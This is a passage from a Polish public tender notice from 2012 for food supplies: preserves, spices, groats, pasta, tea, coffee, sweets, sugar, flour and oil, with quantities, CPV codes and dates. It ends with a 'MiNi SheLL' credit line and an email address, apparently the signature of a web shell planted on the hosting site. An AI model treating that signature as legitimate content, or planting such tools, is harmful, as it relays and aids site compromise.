5	Brzoskwinie konserwowe - połówki owoców  skład  Brzoskwinia w syropie- Opakowanie nie mniejsze niż 0,44-0,5kg)	100	szt
6	Budyń-   Malinowy, śmietankowy, waniliowy, czekoladowy   Opakowanie 1kg	250	szt
7	Buraczki ćwikłowe w zalewie -Opakowanie 1700-1800ml	20	szt
8	Cebulki mini (biała, żółta) -Opakowanie 314-330ml	15	szt
9	Chrzan    skład (Chrzan, kwasek cytrynowy )                                             Opakowanie 0,85-1,0kg	130	szt
10	Cukier waniliowy - Opakowanie 0,50kg	28	kg
11	Cynamon     Opakowanie 20 g	10	szt
12	Czosnek granulowany  Opakowanie 1kg	16	szt
13	Ćwikła z chrzanem   skład Buraki ćwikłowe, chrzan -Opakowania około0,27- 0,3kg	250	szt
14	Dżem owocowy - różne smaki   Wysokosłodzony  kl I                   Opakowanie od 6,5 -7kg	1200	kg
15	Dżem owocowy- różne smaki słodzony fruktozą   43g owoców na 100 g produktu - Opakowanie 195g-250g	20	szt
16	Fasola konserwowa czerwona-Opakowanie  1400-1,600kg)	10	szt
17	Galaretka  Owocowa  - różne smaki-Opakowanie 1 kg	600	szt
18	Gałka muszkatołowa mielona-Opakowanie 15 g	50	szt
19	Goździki-Opakowanie 150g	25	szt
20	Groszek konserwowy-Opakowania1560- 1,840kg)	100	szt
21	Gruszka w syropie -Puszka 2,65-3 kg 	10	szt
22	Imbir   Opakowanie 20 g	50	szt
23	Jałowiec                Opakowanie 20g	5	szt
24	Kakao  Wedel       Opakowanie  100g	10	szt
25	Kawa inka         Opakowanie od 0,15-0,18kg	400	szt
26	Keczup  Włocławek lub produkt równoważny        - skład Koncentrat pomidorowy 30%, cebula, seler, przyprawy  - Opakowania około 1kg	850	szt
27	Kiełki fasoli  mung-Opakowanie  370-400ml	50	szt
28	Kisiel z cukrem -  Cytrynowy, owocowy-Opakowanie 1kg	500	szt
29	Kminek-Opakowanie 20g	5	szt
30	Koncentrat barszczu czerwonego. Zagęszczony sok z buraków ćwikłowych -Opakowanie około 0,3l-0,33l	50	szt
31	Koncentrat pomidorowy 30%  Złoty bażant lub produkt równoważny -Opakowanie 0,85-1,0kg                                                        	400	szt
32	Kotlety sojowe  Na bazie odtłuszczonej maki sojowej, niemodyfikowane genetycznie Opakowanie ok.100g	50	szt
33	Kukurydza konserwowa-Opakowania  1,400kg-1600)	150	szt
34	Kwasek cytrynowy - Opakowanie  1 kg	20	kg
35	Liść laurowy-Opakowanie  0,5kg	24	szt
36	Majeranek   Luz-Opakowanie 1kg	15	kg
37	Majonez dekoracyjny Winiary lub produkt równoważny.  Skład  Olej roślinny, żółtko jaja nie mniej niż 6%, musztarda, przyprawy  Słoik ok. 0,7kg	250	szt
38	Masa makowa-Puszka 0,850-0,900 kg	30	szt
39	Miód naturalny wielokwiatowy-Opakowanie  0,9kg	50	szt
40	Morele suszone-Opakowanie 150g	150	szt
41	Mus jabłkowy-Opakowanie  0,820- 0,9kg	200	szt
42	Musztarda  Sarebska lub stołowa o gęstej konsystencji na bazie gorczycy białej, gorczycy czarnej, ocet, przyprawy             Opakowanie   1kg              	700	szt
43	Ocet spirytusowy 10% -  Opakowanie 0,5l	500	szt
44	Ogórek konserwowy  Fruktus lub produkt równoważny   - skład (Ogórek, ocet spirytusowy )- Opakowanie 0,9-1,0 kg	100	szt
45	Oliwki konserwowe, skład Oliwki zielone ,Oliwki czarne                                   Opakowanie 0,9 - 0,935kg	50	szt
46	Oregano-Opakowanie około 10g	10	szt
47	Orzechy włoskie-Opakowanie 0,100kg	10	szt
48	Owoce koktajlowe konserwowe    Ananas, papaja, guana w syropie-Opakowanie 370g-450g	15	szt
49	Owoce w syropie       Mandarynka, wiśnia, czereśnia ,truskawka-Opakowanie 370-400g	20	szt
50	Papryka konserwowa czerwona - Opakowania 1,6-  1,8 kg)	50	szt
51	Papryka mielona-Opakowanie 1kg	40	kg
52	Patisony-Opakowanie 400g-500g)	20	szt
53	Pędy bambusa-Opakowanie 314-330g	150	szt
54	Pieczarki marynowane  - Opakowanie  0,45-0,55kg)	60	szt
55	Pieczywo chrupkie dietetyczne - lekkie -Opakowanie ok. 220-250g	20	szt
56	Pieprz biały-Opakowanie  700g	5	szt
57	Pieprz czarny mielony -Opakowanie  1kg	15	kg
58	Pieprz ziarnisty -Opakowanie  20g	10	szt
59	Pieprz ziołowy-Opakowanie  20g	10	szt
60	Płatki migdałowe całe, Opakowanie 50g	20	szt
61	Proszek do pieczenia-Opakowanie 15-35g	250	szt
62	Przyprawa do mięs - Knorr lub produkt równoważny ( Sól,  warzywa suszone, czosnek, cebula, przyprawy, substancje wzmacniajace smak i zapach) Opakowanie 700g	10	szt
63	Przyprawa do piernika -Opakowanie 20g	10	szt
64	Przyprawa maślano - ziołowa do warzyw Knorr lub produkt równoważny (Tłuszcz roślinny, masło w proszku, mieszanka przypraw: natka pietruszki,majeranek, cząber,gałka muszkatołowa, pieprz biały, lubczyk ) Opakowanie  1 kg	15	szt
65	Przyprawa w płynie do zup i potraw Knorr lub produkt równoważny (Ekstrakt z lubczyku, woda, sól ) Opakowanie 1 l	700	szt
66	Przyprawa warzywna do potraw typu Vegeta lub produkt równoważny ( Sól kuchenna, suszone warzywa nie mniej niż 14%,Substancje wzmacniające smak, przyprawy ) Opakowanie 1kg	450	kg
67	Rodzynki    Luz	20	kg
68	Słodzik -  Dietetyczny preparat słodzący - Opakowanie od 100 do 300 tabletek	10	szt
69	Sos do deserów  wielosmakowe -Opakowanie 1 kg	30	szt
70	Pieprz ziołowy  - Opakowanie od 0,5 do 1kg	3	kg
71	Sos ogrodowy   Knorr   (sos na bazie ziół, substancje wzmacniające smak i zapach) - Opakowanie 700g	140	szt
72	Suchary bez cukru -Opakowanie  0,285 0,300kg	100	szt
73	Susz owocowy    Luz	5	kg
74	Suszona natka pietruszki-Opakowanie 150g	5	szt
75	Szczaw konserwowy-Opakowanie 0,9-1,0kg	25	szt
76	Szparagi konserwowe białe -Opakowanie 0,110-  0,205kg)	20	szt
77	Śliwki suszone -Opakowanie 150g	150	szt
78	Tobasco -Opakowanie    0,57-0,60ml	15	szt
79	Wafle ryżowe-Opakowanie  100-140g	20	szt
80	Wiśnia, czereśnia dekoracyjna -Opakowanie 225-250g	10	szt
81	Ziele angielskie -Opakowanie 600g	15	szt
82	Zioła prowansalskie -Opakowanie  250g	5	szt
83	Żelatyna    -  Żelatyna wieprzowa   - Opakowanie  1kg	110	kg
84	Żurawina  - Opakowanie 314-330ml	10	szt
85	Żurek Knorr lub produkt równoważny ( Mąka żytnia, mleko w proszku lub śmietanka, boczek wędzony, przyprawy, substancje wzmacniające smak i zapach.) Opakowanie  1 kg	55	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 22.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - produkty przemiału ziarna, skrobi i produktów skrobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Nazwa produktu	Ilość 	JM
1	Kasza gryczana- luz	30	kg
2	Kasza jęczmienna- od 0,9kg do 1 kg	500	kg
3	Kasza manna-1 kg	100	kg
4	Kleik ryżowy błyskawiczny-0,170-0,180kg	100	szt
5	Makaron Penne	10	kg
6	Makaron Knorr lub produkt równoważny o kształcie: kokardki, kolanka z falbanką, nitki, gwiazdki, świderki, spaghetti, rurki, łazanki- od 1kg	1500	kg
7	Makaron-zacierka	900	kg
8	Musli - od 0,3 kg do 0,5kg	30	kg
9	Musli tropikalne - od 0,3 kg do 0,5kg	30	kg
10	Płatki kukurydziane - 1 kg	150	kg
11	Płatki owsiane - 1kg	10	kg
12	Ryż długoziarnisty - 1 - 5 kg	1000	kg
13	Sól - 1 kg	1200	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 3)	Zadanie nr 3 - herbata, kawa, słodycze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Nazwa produktu	Ilość 	JM
1	Baton snickers lub produkt równoważny- od 40-60g 	1500	szt
2	Biszkopty waniliowe- około 140g	50	szt
3	Ciastka czekoladowe- opakowanie od 1kg do  2,5kg	25	kg
4	Cukierki czekoladowe - mieszanka wedlowska lub produkt równoważny-opakowanie od 1kg do  2,5kg	15	kg
5	Czekolada Wedel lub produkt równoważny rózne smaki- 100g	1500	szt
6	Czekolada do fontanny- mleczna, biała, deserowa-2,5 kg	10	kg
7	Herbata ekspresowa czarna Golden assam lub produkt równoważny-ze sznurkiem oraz etykietką-opakowanie około 100szt	25000	saszetka
8	Herbata ekspresowa Lipton  lub produkt równoważny-opakowanie od 50 szt do 100szt- osobno pakowana	2000	saszetka
9	Herbata ekspresowa Saga lub produkt równoważny-opakowanie od100 szt do300szt	110000	saszetka
10	Herbata Lipton granulowana lub produkt równoważny- op 100g	200	szt
11	Herbata Lipton liściasta lub produkt równoważny- op 100g	200	szt
12	Herbata owocowa Bio fix( leśna, malinowa, zielona, rumiankowa, mietowa, koperkowa, hibiskus)-ze sznurkiem oraz etykietką z kopertą - na bazie naturalnych owoców-opakowanie od 25 szt do 60szt	40000	saszetka
13	Herbata owocowa ekspresowa Lipton  lub produkt równoważny-opakowanie od 20szt do 25 szt	500	saszetka
14	Kawa Gevalia-instant lub produkt równoważny- 200g	280	szt
15	Kawa jednorazowa - Nescafe classic bez cukru i śmietanki lub produkt równoważny- opakowanie 100szt x 20g	15	op
16	Kawa rozpuszczalna - Nescafe classic bez cukru i śmietanki lub produkt równoważny- 200g	720	szt
17	Kawa ziarnista- Lavazza (robusta 60%, Arabica 40%) lub produkt równoważny, opakowanie 1 kg	12	kg
18	Mikołaje w czekoladzie  od 60g do 80g	350	szt
19	Paluszki solone - od 100-200g	10	szt
20	Rurki waflowe bez polewy opakowanie od 1 - 2 kg   	5	kg
21	Wafle bez czekolady Grześki lub produkt równoważny 	1000	szt
22	Wafle w czekoladzie Grześki lub produkt równoważny 	1400	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 22.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - cukier i produkty pokrewne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Nazwa produktu	Ilość 	JM
1	Cukier jednorazowy-opakowanie około  0,500g	20	op
2	Cukier kryształ- 1 kg	3200	kg
3	Cukier puder- 0,5 kg	100	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Nazwa produktu	Ilość 	JM
1	Mąka pszenna- 1 kg	3500	kg
2	Mąka pszenna - luz	20	kg
3	Mąka ziemniaczana- 1 kg	30	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 25.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - olej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Nazwa produktu	Ilość 	JM
1	Olej rafinowany olej rzepakowy z pierwszego tłoczenia 100 % W opakowaniach 1l	4000	l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 25.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com